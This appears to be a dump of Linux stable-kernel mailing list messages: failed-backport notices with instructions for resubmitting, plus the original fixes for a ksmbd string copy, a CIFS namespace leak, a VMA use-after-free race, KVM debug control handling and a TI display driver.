CC arch/x86/kernel/cpu/perfctr-watchdog.o
CC block/blk-mq-cpumap.o
CC kernel/time/timekeeping.o
cc1: all warnings being treated as errors
=====================================================
# Builds where the incident occurred:
## cros://chromeos-5.15/x86_64/chromeos-intel-pineview.flavour.config+lab-setup+x86-board+CONFIG_MODULE_COMPRESS=n+CONFIG_MODULE_COMPRESS_NONE=y on (x86_64):
- compiler: gcc-12
- dashboard: https://d.kernelci.org/build/maestro:689b7814233e484a3f8f20f4
#kernelci issue maestro:f3f2b1eabef22152c0bfbd86fe01d397c2c3478a
Reported-by: kernelci.org bot <bot(a)kernelci.org>
--
This is an experimental report format. Please send feedback in!
Talk to us at kernelci(a)lists.linux.dev
Made with love by the KernelCI team - https://kernelci.org
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081244-octagon-curve-7925@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
The patch below does not apply to the 6.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.15.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081241-bobsled-broiling-d341@gregkh' --subject-prefix 'PATCH 6.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
The patch below does not apply to the 6.16-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.16.y
git checkout FETCH_HEAD
git cherry-pick -x 8e7d178d06e8937454b6d2f2811fa6a15656a214
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081238-unnamed-nappy-9be5@gregkh' --subject-prefix 'PATCH 6.16.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 8e7d178d06e8937454b6d2f2811fa6a15656a214 Mon Sep 17 00:00:00 2001
From: Thorsten Blum <thorsten.blum(a)linux.dev>
Date: Wed, 6 Aug 2025 03:03:49 +0200
Subject: [PATCH] smb: server: Fix extension string in
ksmbd_extract_shortname()
In ksmbd_extract_shortname(), strscpy() is incorrectly called with the
length of the source string (excluding the NUL terminator) rather than
the size of the destination buffer. This results in "__" being copied
to 'extension' rather than "___" (two underscores instead of three).
Use the destination buffer size instead to ensure that the string "___"
(three underscores) is copied correctly.
Cc: stable(a)vger.kernel.org
Fixes: e2f34481b24d ("cifsd: add server-side procedures for SMB3")
Signed-off-by: Thorsten Blum <thorsten.blum(a)linux.dev>
Acked-by: Namjae Jeon <linkinjeon(a)kernel.org>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
index 425c756bcfb8..b23203a1c286 100644
--- a/fs/smb/server/smb_common.c
+++ b/fs/smb/server/smb_common.c
@@ -515,7 +515,7 @@ int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
p = strrchr(longname, '.');
if (p == longname) { /*name starts with a dot*/
- strscpy(extension, "___", strlen("___"));
+ strscpy(extension, "___", sizeof(extension));
} else {
if (p) {
p++;
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 59b33fab4ca4d7dacc03367082777627e05d0323
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081245-premises-spoiler-440c@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 59b33fab4ca4d7dacc03367082777627e05d0323 Mon Sep 17 00:00:00 2001
From: Wang Zhaolong <wangzhaolong(a)huaweicloud.com>
Date: Thu, 17 Jul 2025 21:29:26 +0800
Subject: [PATCH] smb: client: fix netns refcount leak after net_passive
changes
After commit 5c70eb5c593d ("net: better track kernel sockets lifetime"),
kernel sockets now use net_passive reference counting. However, commit
95d2b9f693ff ("Revert "smb: client: fix TCP timers deadlock after rmmod"")
restored the manual socket refcount manipulation without adapting to this
new mechanism, causing a memory leak.
The issue can be reproduced by[1]:
1. Creating a network namespace
2. Mounting and Unmounting CIFS within the namespace
3. Deleting the namespace
Some memory leaks may appear after a period of time following step 3.
unreferenced object 0xffff9951419f6b00 (size 256):
comm "ip", pid 447, jiffies 4294692389 (age 14.730s)
hex dump (first 32 bytes):
1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 80 77 c2 44 51 99 ff ff .........w.DQ...
backtrace:
__kmem_cache_alloc_node+0x30e/0x3d0
__kmalloc+0x52/0x120
net_alloc_generic+0x1d/0x30
copy_net_ns+0x86/0x200
create_new_namespaces+0x117/0x300
unshare_nsproxy_namespaces+0x60/0xa0
ksys_unshare+0x148/0x360
__x64_sys_unshare+0x12/0x20
do_syscall_64+0x59/0x110
entry_SYSCALL_64_after_hwframe+0x78/0xe2
...
unreferenced object 0xffff9951442e7500 (size 32):
comm "mount.cifs", pid 475, jiffies 4294693782 (age 13.343s)
hex dump (first 32 bytes):
40 c5 38 46 51 99 ff ff 18 01 96 42 51 99 ff ff @.8FQ......BQ...
01 00 00 00 6f 00 c5 07 6f 00 d8 07 00 00 00 00 ....o...o.......
backtrace:
__kmem_cache_alloc_node+0x30e/0x3d0
kmalloc_trace+0x2a/0x90
ref_tracker_alloc+0x8e/0x1d0
sk_alloc+0x18c/0x1c0
inet_create+0xf1/0x370
__sock_create+0xd7/0x1e0
generic_ip_connect+0x1d4/0x5a0 [cifs]
cifs_get_tcp_session+0x5d0/0x8a0 [cifs]
cifs_mount_get_session+0x47/0x1b0 [cifs]
dfs_mount_share+0xfa/0xa10 [cifs]
cifs_mount+0x68/0x2b0 [cifs]
cifs_smb3_do_mount+0x10b/0x760 [cifs]
smb3_get_tree+0x112/0x2e0 [cifs]
vfs_get_tree+0x29/0xf0
path_mount+0x2d4/0xa00
__se_sys_mount+0x165/0x1d0
Root cause:
When creating kernel sockets, sk_alloc() calls net_passive_inc() for
sockets with sk_net_refcnt=0. The CIFS code manually converts kernel
sockets to user sockets by setting sk_net_refcnt=1, but doesn't call
the corresponding net_passive_dec(). This creates an imbalance in the
net_passive counter, which prevents the network namespace from being
destroyed when its last user reference is dropped. As a result, the
entire namespace and all its associated resources remain allocated.
Timeline of patches leading to this issue:
- commit ef7134c7fc48 ("smb: client: Fix use-after-free of network
namespace.") in v6.12 fixed the original netns UAF by manually
managing socket refcounts
- commit e9f2517a3e18 ("smb: client: fix TCP timers deadlock after
rmmod") in v6.13 attempted to use kernel sockets but introduced
TCP timer issues
- commit 5c70eb5c593d ("net: better track kernel sockets lifetime")
in v6.14-rc5 introduced the net_passive mechanism with
sk_net_refcnt_upgrade() for proper socket conversion
- commit 95d2b9f693ff ("Revert "smb: client: fix TCP timers deadlock
after rmmod"") in v6.15-rc3 reverted to manual refcount management
without adapting to the new net_passive changes
Fix this by using sk_net_refcnt_upgrade() which properly handles the
net_passive counter when converting kernel sockets to user sockets.
Link: https://bugzilla.kernel.org/show_bug.cgi?id=220343 [1]
Fixes: 95d2b9f693ff ("Revert "smb: client: fix TCP timers deadlock after rmmod"")
Cc: stable(a)vger.kernel.org
Reviewed-by: Kuniyuki Iwashima <kuniyu(a)google.com>
Reviewed-by: Enzo Matsumiya <ematsumiya(a)suse.de>
Signed-off-by: Wang Zhaolong <wangzhaolong(a)huaweicloud.com>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
index 205f547ca49e..5eec8957f2a9 100644
--- a/fs/smb/client/connect.c
+++ b/fs/smb/client/connect.c
@@ -3362,18 +3362,15 @@ generic_ip_connect(struct TCP_Server_Info *server)
struct net *net = cifs_net_ns(server);
struct sock *sk;
- rc = __sock_create(net, sfamily, SOCK_STREAM,
- IPPROTO_TCP, &server->ssocket, 1);
+ rc = sock_create_kern(net, sfamily, SOCK_STREAM,
+ IPPROTO_TCP, &server->ssocket);
if (rc < 0) {
cifs_server_dbg(VFS, "Error %d creating socket\n", rc);
return rc;
}
sk = server->ssocket->sk;
- __netns_tracker_free(net, &sk->ns_tracker, false);
- sk->sk_net_refcnt = 1;
- get_net_track(net, &sk->ns_tracker, GFP_KERNEL);
- sock_inuse_add(net, 1);
+ sk_net_refcnt_upgrade(sk);
/* BB other socket options to set KEEPALIVE, NODELAY? */
cifs_dbg(FYI, "Socket created\n");
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 59b33fab4ca4d7dacc03367082777627e05d0323
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081230-dentist-cautious-7bb4@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 59b33fab4ca4d7dacc03367082777627e05d0323 Mon Sep 17 00:00:00 2001
From: Wang Zhaolong <wangzhaolong(a)huaweicloud.com>
Date: Thu, 17 Jul 2025 21:29:26 +0800
Subject: [PATCH] smb: client: fix netns refcount leak after net_passive
changes
After commit 5c70eb5c593d ("net: better track kernel sockets lifetime"),
kernel sockets now use net_passive reference counting. However, commit
95d2b9f693ff ("Revert "smb: client: fix TCP timers deadlock after rmmod"")
restored the manual socket refcount manipulation without adapting to this
new mechanism, causing a memory leak.
The issue can be reproduced by[1]:
1. Creating a network namespace
2. Mounting and Unmounting CIFS within the namespace
3. Deleting the namespace
Some memory leaks may appear after a period of time following step 3.
unreferenced object 0xffff9951419f6b00 (size 256):
comm "ip", pid 447, jiffies 4294692389 (age 14.730s)
hex dump (first 32 bytes):
1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 80 77 c2 44 51 99 ff ff .........w.DQ...
backtrace:
__kmem_cache_alloc_node+0x30e/0x3d0
__kmalloc+0x52/0x120
net_alloc_generic+0x1d/0x30
copy_net_ns+0x86/0x200
create_new_namespaces+0x117/0x300
unshare_nsproxy_namespaces+0x60/0xa0
ksys_unshare+0x148/0x360
__x64_sys_unshare+0x12/0x20
do_syscall_64+0x59/0x110
entry_SYSCALL_64_after_hwframe+0x78/0xe2
...
unreferenced object 0xffff9951442e7500 (size 32):
comm "mount.cifs", pid 475, jiffies 4294693782 (age 13.343s)
hex dump (first 32 bytes):
40 c5 38 46 51 99 ff ff 18 01 96 42 51 99 ff ff @.8FQ......BQ...
01 00 00 00 6f 00 c5 07 6f 00 d8 07 00 00 00 00 ....o...o.......
backtrace:
__kmem_cache_alloc_node+0x30e/0x3d0
kmalloc_trace+0x2a/0x90
ref_tracker_alloc+0x8e/0x1d0
sk_alloc+0x18c/0x1c0
inet_create+0xf1/0x370
__sock_create+0xd7/0x1e0
generic_ip_connect+0x1d4/0x5a0 [cifs]
cifs_get_tcp_session+0x5d0/0x8a0 [cifs]
cifs_mount_get_session+0x47/0x1b0 [cifs]
dfs_mount_share+0xfa/0xa10 [cifs]
cifs_mount+0x68/0x2b0 [cifs]
cifs_smb3_do_mount+0x10b/0x760 [cifs]
smb3_get_tree+0x112/0x2e0 [cifs]
vfs_get_tree+0x29/0xf0
path_mount+0x2d4/0xa00
__se_sys_mount+0x165/0x1d0
Root cause:
When creating kernel sockets, sk_alloc() calls net_passive_inc() for
sockets with sk_net_refcnt=0. The CIFS code manually converts kernel
sockets to user sockets by setting sk_net_refcnt=1, but doesn't call
the corresponding net_passive_dec(). This creates an imbalance in the
net_passive counter, which prevents the network namespace from being
destroyed when its last user reference is dropped. As a result, the
entire namespace and all its associated resources remain allocated.
Timeline of patches leading to this issue:
- commit ef7134c7fc48 ("smb: client: Fix use-after-free of network
namespace.") in v6.12 fixed the original netns UAF by manually
managing socket refcounts
- commit e9f2517a3e18 ("smb: client: fix TCP timers deadlock after
rmmod") in v6.13 attempted to use kernel sockets but introduced
TCP timer issues
- commit 5c70eb5c593d ("net: better track kernel sockets lifetime")
in v6.14-rc5 introduced the net_passive mechanism with
sk_net_refcnt_upgrade() for proper socket conversion
- commit 95d2b9f693ff ("Revert "smb: client: fix TCP timers deadlock
after rmmod"") in v6.15-rc3 reverted to manual refcount management
without adapting to the new net_passive changes
Fix this by using sk_net_refcnt_upgrade() which properly handles the
net_passive counter when converting kernel sockets to user sockets.
Link: https://bugzilla.kernel.org/show_bug.cgi?id=220343 [1]
Fixes: 95d2b9f693ff ("Revert "smb: client: fix TCP timers deadlock after rmmod"")
Cc: stable(a)vger.kernel.org
Reviewed-by: Kuniyuki Iwashima <kuniyu(a)google.com>
Reviewed-by: Enzo Matsumiya <ematsumiya(a)suse.de>
Signed-off-by: Wang Zhaolong <wangzhaolong(a)huaweicloud.com>
Signed-off-by: Steve French <stfrench(a)microsoft.com>
diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
index 205f547ca49e..5eec8957f2a9 100644
--- a/fs/smb/client/connect.c
+++ b/fs/smb/client/connect.c
@@ -3362,18 +3362,15 @@ generic_ip_connect(struct TCP_Server_Info *server)
struct net *net = cifs_net_ns(server);
struct sock *sk;
- rc = __sock_create(net, sfamily, SOCK_STREAM,
- IPPROTO_TCP, &server->ssocket, 1);
+ rc = sock_create_kern(net, sfamily, SOCK_STREAM,
+ IPPROTO_TCP, &server->ssocket);
if (rc < 0) {
cifs_server_dbg(VFS, "Error %d creating socket\n", rc);
return rc;
}
sk = server->ssocket->sk;
- __netns_tracker_free(net, &sk->ns_tracker, false);
- sk->sk_net_refcnt = 1;
- get_net_track(net, &sk->ns_tracker, GFP_KERNEL);
- sock_inuse_add(net, 1);
+ sk_net_refcnt_upgrade(sk);
/* BB other socket options to set KEEPALIVE, NODELAY? */
cifs_dbg(FYI, "Socket created\n");
Currently the driver only configure the data edge sampling partially. The
AM62 require it to be configured in two distincts registers: one in tidss
and one in the general device registers.
Introduce a new dt property to link the proper syscon node from the main
device registers into the tidss driver.
Fixes: 32a1795f57ee ("drm/tidss: New driver for TI Keystone platform Display SubSystem")
---
Cc: stable(a)vger.kernel.org
Signed-off-by: Louis Chauvet <louis.chauvet(a)bootlin.com>
---
Louis Chauvet (4):
dt-bindings: display: ti,am65x-dss: Add clk property for data edge synchronization
dt-bindings: mfd: syscon: Add ti,am625-dss-clk-ctrl
arm64: dts: ti: k3-am62-main: Add tidss clk-ctrl property
drm/tidss: Fix sampling edge configuration
.../devicetree/bindings/display/ti/ti,am65x-dss.yaml | 6 ++++++
Documentation/devicetree/bindings/mfd/syscon.yaml | 3 ++-
arch/arm64/boot/dts/ti/k3-am62-main.dtsi | 6 ++++++
drivers/gpu/drm/tidss/tidss_dispc.c | 14 ++++++++++++++
4 files changed, 28 insertions(+), 1 deletion(-)
---
base-commit: 85c23f28905cf20a86ceec3cfd7a0a5572c9eb13
change-id: 20250730-fix-edge-handling-9123f7438910
Best regards,
--
Louis Chauvet <louis.chauvet(a)bootlin.com>
The patch below does not apply to the 6.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.15.y
git checkout FETCH_HEAD
git cherry-pick -x 9bbffee67ffd16360179327b57f3b1245579ef08
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081243-dense-paragraph-ed33@gregkh' --subject-prefix 'PATCH 6.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 9bbffee67ffd16360179327b57f3b1245579ef08 Mon Sep 17 00:00:00 2001
From: Suren Baghdasaryan <surenb(a)google.com>
Date: Mon, 28 Jul 2025 10:53:55 -0700
Subject: [PATCH] mm: fix a UAF when vma->mm is freed after vma->vm_refcnt got
dropped
By inducing delays in the right places, Jann Horn created a reproducer for
a hard to hit UAF issue that became possible after VMAs were allowed to be
recycled by adding SLAB_TYPESAFE_BY_RCU to their cache.
Race description is borrowed from Jann's discovery report:
lock_vma_under_rcu() looks up a VMA locklessly with mas_walk() under
rcu_read_lock(). At that point, the VMA may be concurrently freed, and it
can be recycled by another process. vma_start_read() then increments the
vma->vm_refcnt (if it is in an acceptable range), and if this succeeds,
vma_start_read() can return a recycled VMA.
In this scenario where the VMA has been recycled, lock_vma_under_rcu()
will then detect the mismatching ->vm_mm pointer and drop the VMA through
vma_end_read(), which calls vma_refcount_put(). vma_refcount_put() drops
the refcount and then calls rcuwait_wake_up() using a copy of vma->vm_mm.
This is wrong: It implicitly assumes that the caller is keeping the VMA's
mm alive, but in this scenario the caller has no relation to the VMA's mm,
so the rcuwait_wake_up() can cause UAF.
The diagram depicting the race:
T1 T2 T3
== == ==
lock_vma_under_rcu
mas_walk
<VMA gets removed from mm>
mmap
<the same VMA is reallocated>
vma_start_read
__refcount_inc_not_zero_limited_acquire
munmap
__vma_enter_locked
refcount_add_not_zero
vma_end_read
vma_refcount_put
__refcount_dec_and_test
rcuwait_wait_event
<finish operation>
rcuwait_wake_up [UAF]
Note that rcuwait_wait_event() in T3 does not block because refcount was
already dropped by T1. At this point T3 can exit and free the mm causing
UAF in T1.
To avoid this we move vma->vm_mm verification into vma_start_read() and
grab vma->vm_mm to stabilize it before vma_refcount_put() operation.
[surenb(a)google.com: v3]
Link: https://lkml.kernel.org/r/20250729145709.2731370-1-surenb@google.com
Link: https://lkml.kernel.org/r/20250728175355.2282375-1-surenb@google.com
Fixes: 3104138517fc ("mm: make vma cache SLAB_TYPESAFE_BY_RCU")
Signed-off-by: Suren Baghdasaryan <surenb(a)google.com>
Reported-by: Jann Horn <jannh(a)google.com>
Closes: https://lore.kernel.org/all/CAG48ez0-deFbVH=E3jbkWx=X3uVbd8nWeo6kbJPQ0KoUD+…
Reviewed-by: Vlastimil Babka <vbabka(a)suse.cz>
Acked-by: Lorenzo Stoakes <lorenzo.stoakes(a)oracle.com>
Cc: Jann Horn <jannh(a)google.com>
Cc: Liam Howlett <liam.howlett(a)oracle.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
diff --git a/include/linux/mmap_lock.h b/include/linux/mmap_lock.h
index 1f4f44951abe..11a078de9150 100644
--- a/include/linux/mmap_lock.h
+++ b/include/linux/mmap_lock.h
@@ -12,6 +12,7 @@ extern int rcuwait_wake_up(struct rcuwait *w);
#include <linux/tracepoint-defs.h>
#include <linux/types.h>
#include <linux/cleanup.h>
+#include <linux/sched/mm.h>
#define MMAP_LOCK_INITIALIZER(name) \
.mmap_lock = __RWSEM_INITIALIZER((name).mmap_lock),
@@ -154,6 +155,10 @@ static inline void vma_refcount_put(struct vm_area_struct *vma)
* reused and attached to a different mm before we lock it.
* Returns the vma on success, NULL on failure to lock and EAGAIN if vma got
* detached.
+ *
+ * WARNING! The vma passed to this function cannot be used if the function
+ * fails to lock it because in certain cases RCU lock is dropped and then
+ * reacquired. Once RCU lock is dropped the vma can be concurently freed.
*/
static inline struct vm_area_struct *vma_start_read(struct mm_struct *mm,
struct vm_area_struct *vma)
@@ -183,6 +188,31 @@ static inline struct vm_area_struct *vma_start_read(struct mm_struct *mm,
}
rwsem_acquire_read(&vma->vmlock_dep_map, 0, 1, _RET_IP_);
+
+ /*
+ * If vma got attached to another mm from under us, that mm is not
+ * stable and can be freed in the narrow window after vma->vm_refcnt
+ * is dropped and before rcuwait_wake_up(mm) is called. Grab it before
+ * releasing vma->vm_refcnt.
+ */
+ if (unlikely(vma->vm_mm != mm)) {
+ /* Use a copy of vm_mm in case vma is freed after we drop vm_refcnt */
+ struct mm_struct *other_mm = vma->vm_mm;
+
+ /*
+ * __mmdrop() is a heavy operation and we don't need RCU
+ * protection here. Release RCU lock during these operations.
+ * We reinstate the RCU read lock as the caller expects it to
+ * be held when this function returns even on error.
+ */
+ rcu_read_unlock();
+ mmgrab(other_mm);
+ vma_refcount_put(vma);
+ mmdrop(other_mm);
+ rcu_read_lock();
+ return NULL;
+ }
+
/*
* Overflow of vm_lock_seq/mm_lock_seq might produce false locked result.
* False unlocked result is impossible because we modify and check
diff --git a/mm/mmap_lock.c b/mm/mmap_lock.c
index 729fb7d0dd59..b006cec8e6fe 100644
--- a/mm/mmap_lock.c
+++ b/mm/mmap_lock.c
@@ -164,8 +164,7 @@ struct vm_area_struct *lock_vma_under_rcu(struct mm_struct *mm,
*/
/* Check if the vma we locked is the right one. */
- if (unlikely(vma->vm_mm != mm ||
- address < vma->vm_start || address >= vma->vm_end))
+ if (unlikely(address < vma->vm_start || address >= vma->vm_end))
goto inval_end_read;
rcu_read_unlock();
@@ -236,11 +235,8 @@ struct vm_area_struct *lock_next_vma(struct mm_struct *mm,
goto fallback;
}
- /*
- * Verify the vma we locked belongs to the same address space and it's
- * not behind of the last search position.
- */
- if (unlikely(vma->vm_mm != mm || from_addr >= vma->vm_end))
+ /* Verify the vma is not behind the last search position. */
+ if (unlikely(from_addr >= vma->vm_end))
goto fallback_unlock;
/*
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x 17ec2f965344ee3fd6620bef7ef68792f4ac3af0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081208-scrubber-veggie-e1a5@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 17ec2f965344ee3fd6620bef7ef68792f4ac3af0 Mon Sep 17 00:00:00 2001
From: Sean Christopherson <seanjc(a)google.com>
Date: Tue, 10 Jun 2025 16:20:06 -0700
Subject: [PATCH] KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is
supported
Let the guest set DEBUGCTL.RTM_DEBUG if RTM is supported according to the
guest CPUID model, as debug support is supposed to be available if RTM is
supported, and there are no known downsides to letting the guest debug RTM
aborts.
Note, there are no known bug reports related to RTM_DEBUG, the primary
motivation is to reduce the probability of breaking existing guests when a
future change adds a missing consistency check on vmcs12.GUEST_DEBUGCTL
(KVM currently lets L2 run with whatever hardware supports; whoops).
Note #2, KVM already emulates DR6.RTM, and doesn't restrict access to
DR7.RTM.
Fixes: 83c529151ab0 ("KVM: x86: expose Intel cpu new features (HLE, RTM) to guest")
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250610232010.162191-5-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
index b7dded3c8113..fa878b136eba 100644
--- a/arch/x86/include/asm/msr-index.h
+++ b/arch/x86/include/asm/msr-index.h
@@ -419,6 +419,7 @@
#define DEBUGCTLMSR_FREEZE_PERFMON_ON_PMI (1UL << 12)
#define DEBUGCTLMSR_FREEZE_IN_SMM_BIT 14
#define DEBUGCTLMSR_FREEZE_IN_SMM (1UL << DEBUGCTLMSR_FREEZE_IN_SMM_BIT)
+#define DEBUGCTLMSR_RTM_DEBUG BIT(15)
#define MSR_PEBS_FRONTEND 0x000003f7
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4ee6cc796855..311f6fa53b67 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2186,6 +2186,10 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
(host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ if (boot_cpu_has(X86_FEATURE_RTM) &&
+ (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
+ debugctl |= DEBUGCTLMSR_RTM_DEBUG;
+
return debugctl;
}
The patch below does not apply to the 6.16-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.16.y
git checkout FETCH_HEAD
git cherry-pick -x 9bbffee67ffd16360179327b57f3b1245579ef08
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081237-buffed-scuba-d3f3@gregkh' --subject-prefix 'PATCH 6.16.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 9bbffee67ffd16360179327b57f3b1245579ef08 Mon Sep 17 00:00:00 2001
From: Suren Baghdasaryan <surenb(a)google.com>
Date: Mon, 28 Jul 2025 10:53:55 -0700
Subject: [PATCH] mm: fix a UAF when vma->mm is freed after vma->vm_refcnt got
dropped
By inducing delays in the right places, Jann Horn created a reproducer for
a hard to hit UAF issue that became possible after VMAs were allowed to be
recycled by adding SLAB_TYPESAFE_BY_RCU to their cache.
Race description is borrowed from Jann's discovery report:
lock_vma_under_rcu() looks up a VMA locklessly with mas_walk() under
rcu_read_lock(). At that point, the VMA may be concurrently freed, and it
can be recycled by another process. vma_start_read() then increments the
vma->vm_refcnt (if it is in an acceptable range), and if this succeeds,
vma_start_read() can return a recycled VMA.
In this scenario where the VMA has been recycled, lock_vma_under_rcu()
